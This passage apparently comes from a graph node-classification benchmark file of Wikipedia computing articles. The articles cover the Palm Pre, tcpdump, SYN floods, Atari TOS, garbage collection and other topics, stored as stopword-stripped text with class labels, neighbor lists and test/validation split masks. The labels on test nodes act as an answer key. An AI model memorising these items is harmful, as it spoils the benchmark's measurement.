sprint phone launch estimated sales approximately 50,000 units day 100,000 week however reports stated sales pre july beginning august much lower expected august 27 2009 bell canada made palm pre available bell supporting data services evdo network november 11 2009 palm announced pre would available mexico naming telcel exclusive carrier pre nation sales mexico began november 27 new version smartphone palm pre plus announced ces 2010 differences included removal center button 16 gb storage memory 8 gb original pre doubling ram 256 mb 512 mb back cover already touchstone compatible keyboard slider mechanism also refined us initially sold exclusively along pixi plus verizon wireless march 22 2010 palm announced would releasing pre plus pixi plus network coming months o2 launched palm pre plus may 16 2010 us 149.99 free touchstone charger new customers october 19 2010 hp announced third generation palm pre palm pre 2 used hp webos 2.0 device 1 ghz processor 512 mb ram 5-megapixel camera adobe flash player 10.1 beta durable hardware including gorilla glass screen phone released consumers france 2010 october sfr canada 2010 december rogers u.s. 2011 february verizon also available unlocked hp hp stated verizon wireless customers would able use skype mobile skype-to-skype calls messaging webos 2.0 released consumer use december 2011 hp provided firmware update 2.2.4 original palm pre cpu 600 mhz texas instruments omap 3430 arm cortex a8 powervr sgx underclocked 500 mhz uses marvell sd8686 chip wireless lan sdio adapter wifi stmicroelectronics vx6852 3.15-megapixel resolution sensor 2048 x 1536 camera pre phones feature 3.1-inch capacitive touchscreen 24-bit color 320×480 resolution hvga liquid-crystal display touchscreen allows manipulation ui fingers instead stylus commonly used older palm phones pdas display gesture area touch-sensitive area led underlighting permits additional touch commands pre full qwerty keyboard pre keyboard slides curved ergonomics addition keyboard device features single button center gesture area absent pre plus volume rocker switch side ringer switch top pre features three input sensors allow respond surroundings accelerometer automatically changes orientation display landscape portrait device rotated user hands ambient light sensor allows pre automatically adjust brightness display proximity sensor allows pre disregard touch inputs phone held close user face call original pre 3 megapixel digital camera led flash pre available high-speed connectivity either evdo rev umts hsdpa depending location pre also includes 802.11b/g wifi bluetooth 2.1+edr support a2dp stereo headsets a-gps support turn-by-turn navigation also included though access agps features remains locked verizon wireless users charging data-transfer pre uses microusb connector usb 2.0 support audio output supported standard 3.5 mm headphone jack phone reports support bluetooth dun protocol sprint permitted use pre tethered phone modem mode verizon support tethering via mobile hot spot support homebrew community many patches apps allow change settings pre one includes free hotspot app sprint users pre 8 gb internal flash storage approximately 7.4 gb user accessible pre flash memory card slot pre plus 16 gb internal flash storage pre charged either using supplied microusb cable using optional accessory wireless charging using electromagnetic induction charging dock dubbed touchstone charger touchstone charger requires compatible back cover also sold separately pre pre plus comes touchstone-compatible back cover included possible access developer mode writing konami code entered upupdowndownleftrightleftrightbastart home screen also possible write webos20090606 pre first palm device use webos linux-based platform replaced palm previous palm os webos interface based system cards used manage multitasking webos also supports multi-touch gestures enabling navigational input made using touchscreen pre include virtual keyboard portrait-oriented slide-out keyboard onscreen virtual keyboard embedded code made available third party patch hundreds third party patches allow users customize usability interface pre webos includes feature called synergy integrates information many sources webos allows user sign accounts gmail yahoo facebook linkedin microsoft outlook via exchange activesync contacts sources integrated single list synergy highly innovative regarded many highlight new operating system received criticism undiscerning included contacts application example engadget commented contacts simply birthdays extracted facebook device makes use cloud based services model uses desktop sync client style palm hotsync synchronization method however palm referenced number solutions users need sync desktop software like palm desktop microsoft outlook ibm lotus notes additionally mark/space inc. announced macintosh desktop sync software chapura software windows palm offered online guide help customers official homebrew third-party packages webos reviewed main article according former debian developer joey hess palm pre periodically sends users information palm palm gathers users gps information along data every application used long used information uploaded palm daily basis opt-out user first uses gps system common mobile carriers google maps also opt-out gps data sent google showcased 2009 january five months prelaunch pre received positive reviews winning cnet best show best category cell phones smartphones people voice ces 2009 palm pre suffered numerous quality issues slider mechanism felt loose could cause wiggle issue became known oreo twist users palm aimed address issue pre plus making slider mechanism stronger curved plastic screen seemed delicate sometimes cracking pocket reports faulty headphone jacks palm pre plus characters sometimes appeared twice typing although user hit key many reviews noted poor build quality phones engadget second open letter palm cited hardware issues plagued pre outward acknowledgment rush correct added 've seen countless reports read many blog posts recall heard sorts horror stories broken sliders power buttons stop functioning oreo cookie effect hell even first review unit broke overall sales modest outset users expressed intense concern slow pace webos upgrade releases absence substantially improved hardware comments critical lengthy delay releasing promised flash application dysfunctional document handling pdf files speculation could underlying technological business reasons slow release webos 2 upgrade existing phones concern eventually released webos 2 upgrade would incompatible palm os emulation media opinion 2010 december enthusiastic fastest-selling cell phone sprint history pre described palm swan song since sales enough keep company afloat leading acquisition hp nonetheless pre still regarded innovative even ten years launch",
    "neighbors": [
      1537,
      3585,
      4609,
      2308,
      9605,
      6790,
      10500,
      3340,
      1682,
      2962,
      405,
      3606,
      8982,
      10393,
      5019,
      8735,
      6178,
      2345,
      5164,
      8621,
      303,
      9266,
      9013,
      694,
      823,
      1849,
      1083,
      1728,
      7492,
      10820,
      5318,
      199,
      11337,
      9163,
      9037,
      2258,
      2259,
      1621,
      6618,
      5339,
      2784,
      1377,
      4194,
      4449,
      3300,
      4832,
      6883,
      487,
      9964,
      2285,
      9581,
      10606,
      1776,
      7409,
      2420,
      8952,
      10109,
      9598,
      8319
    ],
    "mask": "None"
  },
  {
    "node_id": 2286,
    "label": 4,
    "text": "Qualified_website_authentication_certificate:qualified website authentication certificate qualified website authentication certificate qwac certificate qualified digital certificate trust services defined eidas regulation enisa report proposed six strategies twelve recommended actions escalated approach targets important aspects detected critical improving website authentication market europe successfully introducing qualified website authentication certificates means increase transparency market different types website authentication certificates domain validated dv organization validated ov extended validation ev another distinction made among types website authentication certificates relates number domains secured certificate single domain wildcard multi domain extended validation certificates offer highest quality terms assurance identity certificate owner among existing types certificate market typically use ev certificate indicated green color – varies browser eidas regulation taken account established market industrial standardization efforts objective create disruption existing initiatives optimize effort qualified providers align eu regulations existing market standards eidas regulation trust services defined electronic services normally provided trust service providers tsps consist electronic signatures electronic seals electronic time stamps electronic registered delivery services website authentication essence eidas regulation provides framework promote website authentication certificates one five trust service defined eidas regulation article 45 sets requirement trust service providers issuing qualified website authentication certificates qualified implies requirements qualified trust service providers qtsps described previous section applicable annex iv defines content qualified certificates website authentication",
    "neighbors": [
      3264,
      9394,
      5200,
      3231
    ],
    "mask": "None"
  },
  {
    "node_id": 2287,
    "label": 8,
    "text": "Thttpd:thttpd thttpd tiny/turbo/throttling http server open source software web server acme laboratories designed simplicity small execution footprint speed thttpd single-threaded portable compiles cleanly unix-like operating systems including freebsd sunos 4 solaris 2 bsd/os linux osf/1 executable memory size 50 kb used simplified replacement feature-rich servers uniquely suited service high volume requests static data—for example image hosting server first thttpd stands variously tiny turbo throttling thttpd bandwidth throttling feature enables server administrator limit maximum bit rate certain types files may transferred example administrator may choose restrict transfer jpeg image files 20 kilobytes per second prevents connection becoming saturated server still responsive heavy load tradeoff file transfer speed reduced thttpd support x-forwarded-for header least 2 public forks thttpd",
    "neighbors": [
      1920,
      5506,
      4485,
      7430,
      1937,
      7443,
      5397,
      8350,
      7457,
      3746,
      8994,
      11682,
      3237,
      9125,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      11189,
      823,
      6714,
      10436,
      1991,
      11134,
      595,
      1363,
      1747,
      3545,
      225,
      865,
      5731,
      2404,
      4837,
      9320,
      6379,
      9580,
      11376,
      8691,
      5492,
      10611,
      11386,
      2045,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 2288,
    "label": 2,
    "text": "Universal_Access:universal access apple universal access component mac os x operating system provides computing abilities people visual impairment hearing impairment physical disability universal access preference pane system preferences application includes four sub-components providing different options settings",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      1686,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      1699,
      811,
      3371,
      5292,
      1710,
      6700,
      7983,
      4657,
      1074,
      8877,
      10036,
      3766,
      2232,
      9529,
      9912,
      11257,
      9406,
      576,
      1729,
      6849,
      4933,
      713,
      9418,
      9035,
      9802,
      6093,
      3790,
      7118,
      5713,
      1878,
      3670,
      4184,
      3289,
      9430,
      3035,
      4571,
      2141,
      4318,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      5619,
      2676,
      6771,
      7928,
      8441,
      7163,
      7422,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 2289,
    "label": 3,
    "text": "Hostages_(video_game):hostages video game hostages tactical shooter video game developed published infogrames released acorn electron archimedes atari st amiga apple iigs amstrad cpc bbc micro commodore 64 ms-dos msx nes zx spectrum platforms 1988 game released hostage rescue mission united states operation jupiter france nes port titled rescue embassy mission hostages terrorist group overrun embassy paris player takes control six-man gign team mission free hostages game split two three depending platform distinct sections hostages well received critics game received 5 5 stars dragon computer gaming world gave pc version positive review noting poor joystick keyboard response significant problem otherwise great game compute called hostages one better amiga combat games noting involve aliens swords sequel hostages titled alcatraz released infogrames amiga atari st dos platforms 1992",
    "neighbors": [
      10862,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2290,
    "label": 2,
    "text": "Atari_TOS:atari tos tos operating system also tramiel operating system jack tramiel owner atari corp. time operating system atari st range computers range includes 520st 1040st stf/m/fm ste variants mega st/ste later 32-bit machines tt falcon030 developed using new version tos called multitos allowed multitasking recently users developed tos freemint atari tos operating system debuted atari 520st 1985 tos combines digital research gem gui running top dos-like gemdos features include flat memory model ms-dos-compatible disk format starting tos 1.04 support midi variant scsi called acsi later versions atari tos usually run rom chips contained computer thus local hard drives available home computers almost instant-running os tos booted floppy disks first sts half year st introduced st models started shipping latest version tos rom tos consisted following following extensions tos loaded separately true multitasking directly supported tos allowed six desk accessories loaded system similar tsrs terminate stay resident pcs multitos developed allow tos preemptively multitask tos desktop uses icons represent files devices windows dialog boxes display info desktop file desktop.inf read determine window settings icon placements drive icons otherwise standard default desktop two floppy icons trash icon used later versions use newdesk.inf saving reading desktop configuration executable files identified extensions tos programs gem programs auto boot placing folder named auto tos 1.4 allows gem programs set load automatically install application dialog programs *.ttp extensions environments used auto boot desktop accessories placed root directory default drive loaded automatically atari tos based gemdos uses modified fat12 hard disks fat16 file system major differences fact boot sector need contain ibm compatible jump sequence beginning typically 0xe9 0x 0x 0xeb 0x 0x90 lack tos 1.04 oem identifier compatible pc-based systems fact checksum used mark boot sector executable pc format uses signature word 0x55 0xaa instead executable boot sectors atari platform typically start mc68k jump opcode e.g 0x603c last two byte word must sum rest boot sector big-endian word form 0x1234 order bootable unlike ms-dos gemdos would typically allow disks unusual sector track counts disks 10 even 11 sectors per track 80 formatted tracks uncommon atari community typically safe combination 10 sectors per track 80 tracks used yielding unformatted capacity 800kb many users pushed capacity double density disks 900kb using custom formats gemdos disc file systems read using dos windows 9x tos 4.92 version multitos multitasking version tos format .img designed written rom chip tos 4 rom contains five user-selectable language versions",
    "neighbors": [
      2179,
      2181,
      6289,
      8082,
      6675,
      10257,
      9881,
      5663,
      2345,
      7849,
      5293,
      7983,
      11447,
      8136,
      9166,
      6100,
      3797,
      4309,
      6104,
      7269,
      5612,
      8557,
      5359,
      10352,
      11123,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 2291,
    "label": 6,
    "text": "NetWare_File_System:netware file system computing netware file system nwfs file system based heavily modified version fat used novell netware operating system default file system volumes versions 2.x 4.x default file system sys volume continuing version 5.x novell developed two varieties nwfs novell storage services nss released 1998 superseded nwfs format nwfs on-disk format never publicly documented novell published specifications 32-bit nwfs larger files file system utilized performance feature named turbo fat transparent file compression also supported although significant impact performance file serving every name space requires separate directory entry file maximum number directory entries 16,000,000 two resident name spaces would reduce usable maximum number directory entries 8,000,000 three 5,333,333 16-bit nwfs could handle volumes 256 mib however name-space support dedicated api handle macintosh clients",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 2292,
    "label": 4,
    "text": "Tcpdump:tcpdump tcpdump common packet analyzer runs command line allows user display tcp/ip packets transmitted received network computer attached distributed bsd license tcpdump free software tcpdump works unix-like operating systems linux solaris freebsd dragonfly bsd netbsd openbsd openwrt macos hp-ux 11i aix systems tcpdump uses libpcap library capture packets port tcpdump windows called windump uses winpcap windows port libpcap tcpdump originally written 1988 van jacobson sally floyd vern paxson steven mccanne time working lawrence berkeley laboratory network research group late 1990s numerous versions tcpdump distributed part various operating systems numerous patches well coordinated michael richardson mcr bill fenner created www.tcpdump.org 1999. tcpdump prints contents network packets read packets network interface card previously created saved packet file tcpdump write packets standard output file also possible use tcpdump specific purpose intercepting displaying communications another user computer user necessary privileges system acting router gateway unencrypted traffic telnet http passes use tcpdump view login ids passwords urls content websites viewed unencrypted information user may optionally apply bpf-based filter limit number packets seen tcpdump renders output usable networks high volume traffic example available capture interfaces linux system unix-like operating systems user must superuser privileges use tcpdump packet capturing mechanisms systems require elevated privileges however -z option may used drop privileges specific unprivileged user capturing set unix-like operating systems packet capturing mechanism configured allow non-privileged users use done superuser privileges required",
    "neighbors": [
      3714,
      6797,
      5397,
      8725,
      1304,
      6177,
      10788,
      1064,
      1580,
      7983,
      2045,
      823,
      8121,
      5179,
      700,
      5181,
      6083,
      6345,
      842,
      8653,
      9939,
      6997,
      11221,
      7895,
      7385,
      8922,
      9440,
      4071,
      11112,
      8692,
      5245
    ],
    "mask": "None"
  },
  {
    "node_id": 2293,
    "label": 3,
    "text": "PhyreEngine:phyreengine phyreengine free use game engine sony interactive entertainment despite origins sony compatible playstation platforms support playstation 4 playstation 3 playstation vr playstation vita playstation portable microsoft windows opengl directx 11 google android apple ios phyreengine adopted several game studios used 200 published titles phyreengine distributed installable package includes full source code microsoft windows tools provided flexible use license allows playstation 3 game developer publisher tools middleware company create software based partly fully phyreengine platform engine uses sophisticated parallel processing techniques optimized synergistic processor unit spu cell broadband engine ps3 easily ported multi-core architectures phyreengine supports opengl direct3d addition low level ps3 libgcm library provides fully functional “ game templates ” source code including support havok complete xs nvidia physx bullet physics development phyreengine started 2003 create graphics engine playstation 3 first public demonstration occurred 2006 phyreengine launched gdc 2008 phyreengine finalist european develop industry excellence awards 2008 technical innovation category 2009 game engine category new features including deferred rendering showcased gdc 2009 version 2.40 released march 2009 included new “ foliage rendering ” system provides tools technology render ultra-realistic trees plants easily integrated games psp version engine announced sony gdc 2010 version 3.0 released 2011 new powerful asset pipeline combining enhanced versions already robust exporters powerful processing tool generate optimized assets platform also new rewritten level editor permits far data-driven approach authoring games using phyreengine version 3.0 phyreengine adds support playstation vita",
    "neighbors": [
      9472,
      643,
      8454,
      8071,
      2826,
      3210,
      6797,
      5914,
      6311,
      11306,
      684,
      7983,
      306,
      11700,
      6072,
      8122,
      1985,
      3025,
      6738,
      4182,
      5083,
      859,
      9691,
      9445,
      8937,
      4587,
      6004,
      6900,
      1784,
      1916,
      6909
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2294,
    "label": 2,
    "text": "Network_scheduler:network scheduler network scheduler also called packet scheduler queueing discipline qdisc queueing algorithm arbiter node packet switching communication network manages sequence network packets transmit receive queues network interface controller several network schedulers available different operating systems implement many existing network scheduling algorithms network scheduler logic decides network packet forward next network scheduler associated queuing system storing network packets temporarily transmitted systems may single multiple queues case may hold packets one flow classification priority cases may possible schedule transmissions within constraints system cases network scheduler responsible deciding traffic forward gets dropped course time many network queueing disciplines developed provides specific reordering dropping network packets inside various transmit receive buffers queuing disciplines commonly used attempts compensate various networking conditions like reducing latency certain classes network packets generally used part quality service qos measures examples algorithms suitable managing network traffic include several implemented linux kernel modules freely available bufferbloat phenomenon packet-switched networks excess buffering packets causes high latency packet delay variation bufferbloat addressed network scheduler strategically discards packets avoid unnecessarily high buffering backlog examples include codel random early detection network scheduler may responsibility implementation specific network traffic control initiatives network traffic control umbrella term measures aimed reducing congest latency packet loss specifically active queue management aqm selective dropping queued network packets achieve larger goal preventing excessive network congestion scheduler must choose packets drop traffic shaping smooths bandwidth requirements traffic flows delaying transmission packets queued bursts scheduler decides timing transmitted packets quality service prioritization traffic based service class differentiated services reserved connection integrated services linux kernel packet scheduler integral part linux kernel network stack manages transmit receive ring buffers nics working layer 2 osi model handling ethernet frames example packet scheduler configured using utility called codice_1 short traffic control default queuing discipline packet scheduler uses fifo implementation called pfifo_fast although systemd since version 217 changes default queuing discipline fq_codel codice_2 codice_3 utilities enable system administrators configure buffer sizes codice_4 codice_5 device separately terms number ethernet frames regardless size linux kernel network stack contains several buffers managed network scheduler berkeley packet filter filters attached packet scheduler classifiers ebpf functionality brought version 4.1 linux kernel 2015 extends classic bpf programmable classifiers ebpf compiled using llvm ebpf backend loaded running kernel using codice_1 utility altq implementation network scheduler bsds openbsd version 5.5 altq replaced hfsc scheduler",
    "neighbors": [
      1541,
      4616,
      9224,
      3082,
      10785,
      6180,
      8242,
      4161,
      8772,
      6213,
      8262,
      8268,
      589,
      593,
      6244,
      7780,
      5222,
      10856,
      4207,
      3698,
      119,
      5244,
      5245,
      4734,
      11391,
      9345,
      7821,
      4238,
      5774,
      10382,
      2711,
      6808,
      9882,
      10909,
      1694,
      2723,
      8364,
      10933,
      7865,
      5822,
      5824,
      9926,
      1736,
      2762,
      9932,
      6352,
      11474,
      731,
      4831,
      8928,
      11487,
      2278,
      233,
      7403,
      2799,
      10482,
      2804,
      8439,
      5880,
      2809,
      5373,
      6406,
      1801,
      1291,
      4367,
      792,
      5404,
      295,
      7983,
      6968,
      7992,
      318,
      3911,
      11591,
      6988,
      10063,
      2901,
      11095,
      1890,
      10091,
      8573,
      8066,
      900,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      10658,
      1444,
      1445,
      9637,
      935,
      4521,
      939,
      4011,
      1456,
      11698,
      1972,
      8122,
      9151,
      9667,
      1480,
      457,
      3529,
      5585,
      9688,
      2529,
      6625,
      8676,
      2021,
      1513,
      9710,
      3055,
      5105,
      9714,
      2036,
      5620,
      8186,
      2044,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2295,
    "label": 1,
    "text": "Standard_database_management_analysis:standard database management analysis standard database management analysis",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 2296,
    "label": 9,
    "text": "XProc:xproc xproc w3c recommendation define xml transformation language define xml pipelines example abbreviated xproc file pipeline consists two atomic steps xinclude validate pipeline three inputs “ source ” source document “ schemas ” list w3c xml schemas “ parameters ” passing parameters xinclude step reads pipeline input “ source ” produces result document validate step reads pipeline input “ schemas ” output xinclude step produces result document result validation “ result ” result pipeline equivalent less abbreviated xproc pipeline",
    "neighbors": [
      11650,
      8070,
      7943,
      5907,
      10910,
      7455,
      4768,
      10791,
      5677,
      3921,
      10453,
      8923,
      479,
      6629,
      124,
      10611,
      4213,
      502,
      6775,
      10486,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 2297,
    "label": 9,
    "text": "JLab:jlab jlab numerical computational environment implemented java main scripting engine jlab groovysci extension groovy additionally interpreted j-scripts similar matlab dynamic linking java class code supported jlab environment aims provide matlab/scilab like scientific computing platform supported scripting engines implemented java language current implementation jlab coexist two scripting engines",
    "neighbors": [
      8262,
      6074,
      5677,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 2298,
    "label": 8,
    "text": "Web_annotation:web annotation web annotation online annotation associated web resource typically web page web annotation system user add modify remove information web resource without modifying resource annotations thought layer top existing resource annotation layer usually visible users share annotation system cases web annotation tool type social software tool web-based text annotation systems see text annotation web annotation used following purposes annotations considered additional layer respect comments comments published publisher hosts original document annotations added top may eventually become comments turn may integrated version document web annotations first standardised february 23 2017 release three official recommendations w3c web annotation working group w3c also previous web annotation standardisation effort annotea see conceived part semantic web many systems require software installed enable features fact noted footnotes software required additional software provided third party",
    "neighbors": [
      8627,
      8084,
      5078,
      3462
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2299,
    "label": 4,
    "text": "SYN_flood:syn flood syn flood form denial-of-service attack attacker sends succession codice_1 requests target system attempt consume enough server resources make system unresponsive legitimate traffic normally client attempts start tcp connection server client server exchange series messages normally runs like called tcp three-way handshake foundation every connection established using tcp protocol syn flood attack works responding server expected codice_4 code malicious client either simply send expected codice_4 spoofing source ip address codice_1 causing server send codice_3 falsified ip address – send codice_4 knows never sent codice_1 server wait acknowledgement time simple network congestion could also cause missing codice_4 however attack half-open connections created malicious client bind resources server may eventually exceed resources available server point server connect clients whether legitimate otherwise effectively denies service legitimate clients systems may also malfunction crash operating system functions starved resources way number well-known countermeasures listed rfc 4987 including",
    "neighbors": [
      2947,
      4490,
      4495,
      5402,
      9372,
      10924,
      953,
      7102,
      3006,
      6080,
      8770,
      9282,
      3024,
      3282,
      10852,
      2409,
      4074,
      4725,
      6394
    ],
    "mask": "Test"
  },
  {
    "node_id": 2300,
    "label": 4,
    "text": "Lucideus:lucideus lucideus enterprise cyber security platforms company incubated iit bombay backed cisco former chairman ceo john chambers protects multiple fortune 500 companies governments around world name lucideus derived lucifer satan deus god business hacking good company offers safe security assessment framework enterprise artificial intelligence machine learning platform used cyber-security risk analysis mitigation lucideus worked university delhi year-long postgraduate diploma course cyber security also signed r partnership agreements ground research cyber security technion university mit 2012 saket modi computer science engineer founded lucideus along co-founders vidit baxi rahul tyagi gathered together team security professionals started company objective providing cyber security training beginning 2013 lucideus launched range enterprise cyber security services company today works actively areas 2017 lucideus launched cyber risk assessment platform safe safe security assessment framework enterprises integrates existing technology stack enterprise provide real-time cyber risk assessment score number 0-5 macro level across organisation broken micro-level scoring safe score individually asset safe security assessment framework enterprise de-jargonizes cyber security understanding providing ‘ one ’ number standard 0 5 estimates overall cyber health organisation takes account controls across people process technology lucideus aims make cyber risk informed business decision allow security team communicate non tech specialists cxos business unit leaders board cyber security posture enterprise lucideus pure-play cyber security services platforms provider builds delivers information security services generic customised pro actively secure continuously monitor re-actively respond cyber threats technology stack one companies 100 oscp offensive security certified professional certified delivery team enterprise cyber security services follows proactive continuous reactive approach security lucideus responsible security assessment applications built national payments corporation india bharat interface money bhim payment app november 2018 lucideus announced series funding 5m led john chambers",
    "neighbors": [
      3941,
      7503,
      4081,
      6834,
      4062,
      575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2301,
    "label": 2,
    "text": "COSIX:cosix cosix chinese unix operating system developed since 1989 china national computer software technology service corporation cs jointly developed 64-bit version compaq released 1999 early version cosix kernel developed based unix system v 64-bit version based tru64 unix linux distribution named cosix linux developed cs released 1999 technical relationship cosix",
    "neighbors": [
      6787,
      6412,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      9151,
      10436,
      6369,
      6760,
      5492,
      2424,
      633
    ],
    "mask": "Test"
  },
  {
    "node_id": 2302,
    "label": 3,
    "text": "Branch_Queue:branch queue computer architecture branch predictions branch queue takes place branch predictor predicts branch taken branch queue stores predictions used later branch queue consists 2 values taken taken branch queue helps algorithms increase parallelism optimization software implemented hardware one falls hardware software co-design",
    "neighbors": [
      9932,
      8231
    ],
    "mask": "None"
  },
  {
    "node_id": 2303,
    "label": 2,
    "text": "EOS_(operating_system):eos operating system eos discontinued operating system developed eta systems spin-off division control data corporation use eta10 line supercomputers 1980s eos preceded binary executable compatible cdc vsos operating system cyber 205 like vsos eos demand paged virtual memory vs part 2 pages sizes improved virtual memory performance eta faster hardware pipelines though roots interactive livermore time sharing system ltss vsos focused batch-oriented operating system vsos run many institutions application-oriented performance historic focus supercomputing set features behind times limited user base address feature deficiency make operating system normal use vsos characteristics married unix characteristics hybrid os os intended effective batch work drove hardware maximum interactive use development unix workstation eos written mainly cybil pascal-like programming language created control data later cyber operating systems new effort vsos implemented impl fortran-like language created ltss implementation command line appearance systems similar lineage going back univac exec*8 eos released early hardware deliveries typical problems early os releases customers delayed payment supercomputer installations eta later released port unix eta-10 line quickly accepted customer base however port started single-processor kernel transparently exploit hardware architecture 8 large application cpus applications",
    "neighbors": [
      673,
      2179,
      7173,
      8262,
      11205,
      1480,
      7497,
      8524,
      7983,
      1776,
      5363,
      5492,
      6675,
      11539,
      3960,
      11517,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2304,
    "label": 2,
    "text": "Garbage_collection_(computer_science):garbage collection computer science computer science garbage collection gc form automatic memory management garbage collector collector attempts reclaim garbage memory occupied objects longer use program garbage collection invented john mccarthy around 1959 simplify manual memory management lisp garbage collection essentially opposite manual memory management requires programmer specify objects deallocate return memory system however many systems use combination approaches including techniques stack allocation region inference like memory management techniques garbage collection may take significant proportion total processing time program result significant influence performance good implementations enough memory depending application garbage collection faster manual memory management opposite also true often case past sub-optimal gc algorithms resources memory network sockets database handles user interaction windows file device descriptors typically handled garbage collection methods used manage resources particularly destructors may suffice manage memory well leaving need gc gc systems allow resources associated region memory collected causes resource reclaimed called finalization finalization may introduce complications limiting usability intolerable latency disuse reclaim especially limited resources lack control thread performs work reclaiming basic principles garbage collection find data objects program accessed future reclaim resources used objects many programming languages require garbage collection either part language specification example java c go scripting languages effectively practical implementation example formal languages like lambda calculus said garbage collected languages languages designed use manual memory management garbage-collected implementations available example c c++ languages like ada modula-3 c++/cli allow garbage collection manual memory management co-exist application using separate heaps collected manually managed objects others like garbage-collected allow user manually delete objects also entirely disable garbage collection speed required integrating garbage collection language compiler runtime system enables much wider choice methods post-hoc gc systems exist automatic reference counting arc including require recompilation post-hoc gc sometimes distinguished litter collection garbage collector almost always closely integrated memory allocator garbage collection frees programmer manually dealing memory deallocation result certain categories bugs eliminated substantially reduced bugs addressed garbage collection security implications typically garbage collection certain disadvantages including consuming additional resources performance impacts possible stalls program execution incompatibility manual resource management garbage collection consumes computing resources deciding memory free even though programmer may already known information penalty convenience annotating object lifetime manually source code overhead lead decreased uneven performance peer-reviewed paper came conclusion gc needs five times memory compensate overhead perform fast explicit memory management interaction memory hierarchy effects make overhead intolerable circumstances hard predict detect routine testing impact performance also given apple reason adopting garbage collection ios despite desired feature moment garbage actually collected unpredictable resulting stalls pauses shift/free memory scattered throughout session unpredictable stalls unacceptable real-time environments transaction processing interactive programs incremental concurrent real-time garbage collectors address problems varying trade-offs modern gc implementations try minimize blocking stop-the-world stalls much work possible background i.e separate thread example marking unreachable garbage instances application process continues run spite advancements example .net clr paradigm still difficult maintain large heaps millions objects resident objects get promoted older generations without incurring noticeable delays sometimes seconds need explicit manual resource management release/close non-gced resources object oriented language becomes transitive composition non-deterministic gc system resource resource-like object requires manual resource management release/close object used part another object composed object also become resource-like object requires manual resource management release/close tracing garbage collection common type garbage collection much garbage collection often refers tracing garbage collection rather methods reference counting overall strategy consists determining objects garbage collected tracing objects reachable chain references certain root objects considering rest garbage collecting however large number algorithms used implementation widely varying complexity performance characteristics reference counting garbage collection object count number references garbage identified reference count zero object reference count incremented reference created decremented reference destroyed count reaches zero object memory reclaimed manual memory management unlike tracing garbage collection reference counting guarantees objects destroyed soon last reference destroyed usually accesses memory either cpu caches objects freed directly pointed thus tends significant negative side effects cpu cache virtual memory operation number disadvantages reference counting generally solved mitigated sophisticated algorithms escape analysis compile-time technique convert heap allocations stack allocations thereby reducing amount garbage collection done analysis determines whether object allocated inside function accessible outside function-local allocation found accessible another function thread allocation said “ escape ” done stack otherwise object may allocated directly stack released function returns bypassing heap associated memory management costs generally speaking higher-level programming languages likely garbage collection standard feature languages built garbage collection added library boehm garbage collector c c++ functional programming languages ml haskell apl garbage collection built lisp especially notable first functional programming language first language introduce garbage collection dynamic languages ruby julia perl 5 php version 5.3 use reference counting javascript ecmascript also tend use gc object-oriented programming languages smalltalk java usually provide integrated garbage collection notable exceptions c++ delphi destructors historically languages intended beginners basic logo often used garbage collection heap-allocated variable-length data types strings lists burden programmers manual memory management early microcomputers limited memory slow processors basic garbage collection could often cause apparently random inexplicable pauses midst program operation basic interpreters applesoft basic apple ii family repeatedly scanned string descriptors string highest address order compact toward high memory resulting n performance could introduce minutes-long pauses execution string-intensive programs replacement garbage collector applesoft basic published call-a.p.p.l.e january 1981 pages 40–45 randy wigginton identified group strings every pass heap cut collection time dramatically basic.system released prodos 1983 provided windowing garbage collector basic reduced collections fraction second objective-c traditionally garbage collection release os x 10.5 2007 apple introduced garbage collection objective-c 2.0 using in-house developed runtime collector however 2012 release os x 10.8 garbage collection deprecated favor llvm automatic reference counter arc introduced os x 10.7 furthermore since may 2015 apple even forbids usage garbage collection new os x applications app store ios garbage collection never introduced due problems application responsivity performance instead ios uses arc garbage collection rarely used embedded real-time systems perceived need tight control use limited resources however garbage collectors compatible limited environments developed microsoft .net micro framework .net nanoframework java platform micro edition embedded software platforms like larger cousins include garbage collection among popular garbage collectors jdk could named commonly people compare garbage collectors terms ram consumption optimization receive different results compile-time garbage collection form static analysis allowing memory reused reclaimed based invariants known compilation form garbage collection studied mercury programming language saw greater usage introduction llvm automatic reference 